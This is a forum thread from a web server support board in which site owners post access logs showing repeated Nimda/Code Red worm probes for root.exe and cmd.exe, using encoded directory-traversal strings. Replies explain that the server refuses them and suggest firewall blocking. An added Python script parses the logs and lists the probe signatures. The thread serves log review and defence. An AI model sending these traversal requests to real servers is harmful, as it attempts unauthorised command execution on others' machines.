DLashley
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
Posted: Tue Dec 31, 2002 5:25 pm Post subject: Am I being hacked?
All of a sudden, the ERRORS on my server stats screen shot up, and so did the bandwidth. I checked my cgi and access logs. There wasn't anything in the cgi log, but this was in the access log.
What does this mean? Is someone trying to hack me?
Code:
69.3.21.188 - - [31/Dec/2002:11:18:40 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:18:49 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:18:58 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:07 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:15 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:33 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:42 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:50 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:08 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:17 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:44 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:53 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
_________________ DLashley
Jack (Guest)
Posted: Tue Dec 31, 2002 5:40 pm Post subject: Nimda...
Hi,
I'm not sure (never am) but a quick search on Google (I'm sure you've heard of that) returns something on this...
The log entries you are experiencing are typical of Nimda checking for a vulnerable webserver. The exploit is possible (correct me if I'm wrong) on some old IIS servers; it does not affect Abyss.
Of course it might not be Nimda, but rather just some hacker tool trying the exploit, not sure though, I'm not a security pro...
Cheers,
Jack
DLashley
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
Posted: Tue Dec 31, 2002 7:10 pm Post subject: Re: Nimda...
Jack wrote:
Hi,
I'm not sure (never am) but a quick search on Google (I'm sure you've heard of that) returns something on this...
The log entries you are experiencing are typical of Nimda checking for a vulnerable webserver. The exploit is possible (correct me if I'm wrong) on some old IIS servers; it does not affect Abyss.
Of course it might not be Nimda, but rather just some hacker tool trying the exploit, not sure though, I'm not a security pro...
Cheers,
Jack
Hi Jack,
Thanks for responding. This happened the other night too. I think this person bookmarked my site to try again, because the attempts were from the same range of IPs.
I'm new to reading access logs, but this looked suspicious. Looked like someone was trying to find something on my PC. Also, looks like they didn't have any luck. :P
_________________ DLashley
Ryan (Guest)
Posted: Tue Dec 31, 2002 9:25 pm
It's Nimda/Code Red trying to gain root/cmd access. Fortunately, Abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the IP. But then again, there are a lot of machines out there doing this, so a few IPs won't do much.
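Added example, not code from the thread or from Aprelium: a small Python script that parses Common Log Format lines like the ones posted above, flags requests carrying the Nimda / Code Red II probe signatures (root.exe, cmd.exe, and the single-, double- and overlong-UTF-8-encoded "..%xx.." traversal segments), and summarises per source IP how many probes arrived, how many response bytes they cost, and whether any probe got anything other than a 4xx/5xx refusal. The three 69.3.21.188 lines are copied from the first post in this thread; the 10.0.0.5 and 192.0.2.9 lines are constructed to show ordinary traffic and what a probe that was not refused would look like. The regex, the PROBE_MARKERS list and the field names are my own assumptions, not an Abyss feature.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format as written by Abyss; the trailing referer/user-agent
# fields are optional so lines with and without them both parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Substrings that characterise the probe sequence seen in the thread.
# Matching is case-insensitive; these are detection markers for log review.
PROBE_MARKERS = (
    "root.exe",
    "cmd.exe",
    "..%255c",      # double-encoded backslash
    "..%252f",      # double-encoded slash
    "..%25%35%63",  # "%5c" with each character itself percent-encoded
    "..%c0%af",     # overlong UTF-8 for "/"
    "..%c0%2f",
    "..%c1%1c",     # overlong UTF-8 for "\"
    "..%c1%9c",
)

# Sample input. First three lines: from this thread. Last two: constructed.
SAMPLE_LOG = [
    '69.3.21.188 - - [31/Dec/2002:11:18:40 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427 "" ""',
    '69.3.21.188 - - [31/Dec/2002:11:19:15 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""',
    '69.3.21.188 - - [31/Dec/2002:11:20:08 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""',
    '10.0.0.5 - - [31/Dec/2002:11:21:00 +1133] "GET /index.html HTTP/1.0" 200 1532 "" ""',
    '192.0.2.9 - - [31/Dec/2002:11:22:00 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 618 "" ""',
]


def decode_twice(path):
    """Show how a double-encoded segment collapses: %255c -> %5c -> backslash."""
    return unquote(unquote(path))


def is_probe(path):
    """True if the request path carries any of the known probe markers."""
    p = path.lower()
    return any(marker in p for marker in PROBE_MARKERS)


def parse_line(line):
    """Return a dict of log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def summarise(lines):
    """Per-source summary: probe count, bytes served, and any probe not refused."""
    per_ip = defaultdict(lambda: {"probes": 0, "bytes": 0, "not_refused": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["path"]):
            continue
        entry = per_ip[rec["ip"]]
        entry["probes"] += 1
        entry["bytes"] += rec["bytes"]
        # A 4xx/5xx is the server refusing; anything lower means the
        # request was actually served and needs a closer look.
        if rec["status"] < 400:
            entry["not_refused"].append(rec["path"])
    return dict(per_ip)


if __name__ == "__main__":
    for ip, entry in summarise(SAMPLE_LOG).items():
        flag = "ALERT" if entry["not_refused"] else "refused"
        print(f"{ip}: {entry['probes']} probes, {entry['bytes']} bytes, {flag}")
    print(decode_twice("/scripts/..%255c../winnt/system32/cmd.exe"))
```

Running it against a real Abyss log shows two things this thread keeps coming back to: the bandwidth cost is just the size of the error pages the server sends back for each refused request, and the value worth watching is `not_refused`, which stays empty as long as every probe gets a 400 or 404.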
DLashley
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
Posted: Tue Dec 31, 2002 11:41 pm
Ryan wrote: It's Nimda/Code Red trying to gain root/cmd access. Fortunately, Abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the IP. But then again, there are a lot of machines out there doing this, so a few IPs won't do much.
Thank you for responding, Ryan. :-)
So basically, I'm safe from this thing???
Here are more attempts:
Code:
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:26 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
_________________ DLashley
|
aprelium
Joined: 22 Mar 2002 Posts: 6800
Posted: Wed Jan 01, 2003 4:24 pm
DLashley wrote: So basically, I'm safe from this thing???
Yes, you're safe. Abyss Web Server always denies these requests.
_________________ Support Team
Aprelium - http://www.aprelium.com
Guest
Posted: Wed Jan 01, 2003 5:19 pm
Thanks for the reassurance. Safety is my main concern.
Guest
Posted: Wed Jan 01, 2003 5:21 pm
Ryan wrote: It's Nimda/Code Red trying to gain root/cmd access. Fortunately, Abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the IP. But then again, there are a lot of machines out there doing this, so a few IPs won't do much.
Even though the requests are being denied, this jerk is eating up my bandwidth with this nonsense.
How do you block the IP in Abyss Web Server? Do you use .htaccess?
Guest
Posted: Wed Jan 01, 2003 7:10 pm
You can't block his IP yet, until the next release of Abyss... I am looking forward to this feature also.
NASCHPITZ (Guest)
Posted: Mon Jan 20, 2003 4:20 am Post subject: The same is happening with me.
Take a look at my .log file:
200.149.180.161 - - [19/Jan/2003:17:19:05 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:12 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:15 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:25 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:31 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:38 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:42 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:46 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:53 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:56 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:00 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:11 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:18 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
This is just a small part of the .log file; there are MANY other attacks.
I don't use any kind of firewall, because they block the server. Am I under any risk? Thank you in advance.
Brazil - Rio de Janeiro
thedane
Joined: 18 Jan 2003 Posts: 10 Location: Holland
Posted: Mon Jan 20, 2003 9:56 am Post subject: Re: The same is happening with me.
NASCHPITZ wrote:
Take a look at my .log file:
[..]
I don't use any kind of firewall, because they block the server. Am I under any risk? Thank you in advance.
Brazil - Rio de Janeiro
Most firewalls (even the built-in one in Windows XP) have a function to allow or disallow requests from a single IP address or from multiple IP addresses.
I'm using ZoneAlarm, which I have set up to allow only HTTP requests to port 8080, the port Abyss Web Server is listening on. Any other requests, such as those stated above, will be automagically blocked.
_________________ "hmm, that's odd"
Vitalichka
Joined: 25 Jan 2003 Posts: 7
Posted: Sun Jan 26, 2003 3:13 am
I have a similar problem and aprelium sent me over to this post to read.
My question now is... The IP of the person or machine trying to hack in is coming from AT&T, and they are my provider. I traced the IPs. They do not allow one to run servers. I was wondering, since the IP traces back to AT&T Broadband, would that mean it's just a user of the service, or is it AT&T checking up on me through their check-up service systems?
Thank you. Anything will help.
feamsr00
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
Posted: Sun Jan 26, 2003 9:26 am
Is the IP from a pool, or does it look internal? (If not sure, post the DNS name of the IP.)
beecheyj_14
Joined: 11 Aug 2003 Posts: 1
Posted: Fri Aug 15, 2003 10:56 pm Post subject: i'm getting the same thing
There's a bunch of those in my access log too, and most of them are from people within my ISP. Is this a good thing?